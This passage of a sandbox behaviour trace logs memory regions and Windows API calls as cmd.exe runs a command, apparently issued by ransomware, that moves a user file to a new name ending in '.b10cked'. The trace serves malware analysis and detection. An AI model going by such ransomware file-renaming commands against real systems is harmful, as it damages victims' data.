"c:\\windows\\system32\\imm32.dll") Region: id = 30109 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30110 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 30111 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 30112 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 30113 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 30114 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 30115 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 30116 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 30117 start_va = 0x1310000 end_va = 0x13cffff entry_point = 0x1310000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 658 os_tid = 0xc98 [0203.152] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f7c4 | out: lpSystemTimeAsFileTime=0x14f7c4*(dwLowDateTime=0xade73340, dwHighDateTime=0x1d440a9)) [0203.152] GetCurrentProcessId () returned 0xa18 [0203.152] GetCurrentThreadId () returned 0xc98 [0203.152] GetTickCount () returned 0x394ee [0203.152] QueryPerformanceCounter (in: lpPerformanceCount=0x14f7bc | out: lpPerformanceCount=0x14f7bc*=25994152944) returned 1 [0203.153] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0203.153] __set_app_type (_Type=0x1) [0203.153] __p__fmode () returned 0x76b331f4 [0203.153] __p__commode () returned 0x76b331fc [0203.153] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0203.153] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0203.153] GetCurrentThreadId () returned 0xc98 [0203.153] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc98) returned 0x38 [0203.153] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0203.153] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0203.153] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.154] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.154] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f754 | out: phkResult=0x14f754*=0x0) returned 0x2 [0203.154] VirtualQuery (in: lpAddress=0x14f78b, lpBuffer=0x14f724, dwLength=0x1c | out: lpBuffer=0x14f724*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.154] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f724, dwLength=0x1c | out: lpBuffer=0x14f724*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0203.154] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f724, dwLength=0x1c | out: lpBuffer=0x14f724*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0203.154] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f724, dwLength=0x1c | out: lpBuffer=0x14f724*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.154] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f724, dwLength=0x1c | out: lpBuffer=0x14f724*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0203.154] GetConsoleOutputCP () returned 0x1b5 [0203.154] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.154] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0203.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.154] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0203.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.154] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0203.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.154] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0203.155] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.155] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0203.155] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.155] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0203.155] GetEnvironmentStringsW () returned 0x1b0188* [0203.155] FreeEnvironmentStringsW (penv=0x1b0188) returned 1 [0203.155] GetEnvironmentStringsW () returned 0x1b0188* [0203.155] FreeEnvironmentStringsW (penv=0x1b0188) returned 1 [0203.155] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e6c4 | out: phkResult=0x14e6c4*=0x40) returned 0x0 [0203.155] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0xb0, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.155] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x1, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.155] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0x1, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.155] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x0, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.155] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x40, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x40, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0x40, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.156] RegCloseKey (hKey=0x40) returned 0x0 [0203.156] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e6c4 | out: phkResult=0x14e6c4*=0x40) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0x40, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x1, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0x1, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x0, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x9, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x4, lpData=0x14e6d0*=0x9, lpcbData=0x14e6c8*=0x4) returned 0x0 [0203.156] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e6cc, lpData=0x14e6d0, lpcbData=0x14e6c8*=0x1000 | out: lpType=0x14e6cc*=0x0, lpData=0x14e6d0*=0x9, lpcbData=0x14e6c8*=0x1000) returned 0x2 [0203.156] RegCloseKey (hKey=0x40) returned 0x0 [0203.156] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a5 [0203.156] srand (_Seed=0x5b8863a5) [0203.156] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked\"" [0203.156] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked\"" [0203.156] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.156] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0203.157] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.157] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.157] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.157] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0203.157] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0203.157] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0203.157] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0203.157] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0203.157] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0203.157] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0203.157] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0203.157] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0203.157] GetEnvironmentStringsW () returned 0x1b22d8* [0203.157] FreeEnvironmentStringsW (penv=0x1b22d8) returned 1 [0203.157] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.157] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.157] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0203.157] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0203.157] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0203.157] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0203.157] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0203.157] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0203.157] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0203.157] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0203.157] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f490 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.157] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f490, lpFilePart=0x14f48c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f48c*="Desktop") returned 0x18 [0203.157] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0203.158] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f20c | out: lpFindFileData=0x14f20c) returned 0x1b0018 [0203.158] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0203.158] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f20c | out: lpFindFileData=0x14f20c) returned 0x1b0018 [0203.158] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0203.158] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f20c | out: lpFindFileData=0x14f20c) returned 0x1b0018 [0203.158] FindClose (in: hFindFile=0x1b0018 | out: hFindFile=0x1b0018) returned 1 [0203.158] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0203.158] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0203.158] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0203.158] GetEnvironmentStringsW () returned 0x1b2af8* [0203.158] FreeEnvironmentStringsW (penv=0x1b2af8) returned 1 [0203.158] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.159] GetConsoleOutputCP () returned 0x1b5 [0203.159] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.159] GetUserDefaultLCID () returned 0x409 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f5d0, cchData=128 | out: lpLCData="0") returned 2 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f5d0, cchData=128 | out: lpLCData="0") returned 2 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f5d0, cchData=128 | out: lpLCData="1") returned 2 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0203.159] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0203.160] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0203.160] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0203.160] GetConsoleTitleW (in: lpConsoleTitle=0x1a08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.161] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0203.161] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0203.161] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0203.161] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0203.161] _wcsicmp (_String1="move", _String2=")") returned 68 [0203.161] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0203.161] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0203.161] _wcsicmp (_String1="IF", _String2="move") returned -4 [0203.162] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0203.162] _wcsicmp (_String1="REM", _String2="move") returned 5 [0203.162] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0203.164] GetConsoleTitleW (in: lpConsoleTitle=0x14f2c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.164] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0203.164] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0203.164] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0203.164] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0203.164] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0203.164] _wcsicmp (_String1="move", _String2="CD") returned 10 [0203.164] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0203.165] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0203.165] _wcsicmp (_String1="move", _String2="REN") returned -5 [0203.165] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0203.165] _wcsicmp (_String1="move", _String2="SET") returned -6 [0203.165] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0203.165] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0203.165] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0203.165] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0203.165] _wcsicmp (_String1="move", _String2="MD") returned 11 [0203.165] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0203.165] _wcsicmp (_String1="move", _String2="RD") returned -5 [0203.165] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0203.165] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0203.165] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0203.165] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0203.165] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0203.165] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0203.165] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0203.165] _wcsicmp (_String1="move", _String2="VER") returned -9 [0203.165] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0203.165] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0203.165] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0203.165] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0203.165] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0203.165] _wcsicmp (_String1="move", _String2="START") returned -6 [0203.165] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0203.165] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0203.165] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0203.166] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.167] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.167] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f084, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f07c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f07c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.167] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0203.168] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0203.168] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0203.168] _wcsicmp (_String1="MSINFO~1.HXN", _String2=".") returned 63 [0203.168] _wcsicmp (_String1="MSINFO~1.HXN", _String2="..") returned 63 [0203.168] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msinfo~1.hxn")) returned 0x2022 [0203.168] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1b1e48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.168] SetErrorMode (uMode=0x0) returned 0x0 [0203.169] SetErrorMode (uMode=0x1) returned 0x0 [0203.169] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", nBufferLength=0x104, lpBuffer=0x14ea0c, lpFilePart=0x14e9f4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", lpFilePart=0x14e9f4*="MSINFO~1.HXN") returned 0x27 [0203.169] SetErrorMode (uMode=0x0) returned 0x1 [0203.169] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0203.169] _wcsicmp (_String1="MSINFO~1.HXN", _String2=".") returned 63 [0203.169] _wcsicmp (_String1="MSINFO~1.HXN", _String2="..") returned 63 [0203.169] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msinfo~1.hxn")) returned 0x2022 [0203.169] SetErrorMode (uMode=0x0) returned 0x0 [0203.169] SetErrorMode (uMode=0x1) returned 0x0 [0203.169] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", nBufferLength=0x104, lpBuffer=0x14ee88, lpFilePart=0x14ec20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", lpFilePart=0x14ec20*="MSINFO~1.HXN") returned 0x27 [0203.169] SetErrorMode (uMode=0x0) returned 0x1 [0203.169] SetErrorMode (uMode=0x0) returned 0x0 [0203.169] SetErrorMode (uMode=0x1) returned 0x0 [0203.169] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x14f090, lpFilePart=0x14ec20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked", lpFilePart=0x14ec20*="MS.INFOPATH.14.1033.hxn.b10cked") returned 0x3a [0203.169] SetErrorMode (uMode=0x0) returned 0x1 [0203.169] SetLastError (dwErrCode=0x0) [0203.169] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked" (normalized: 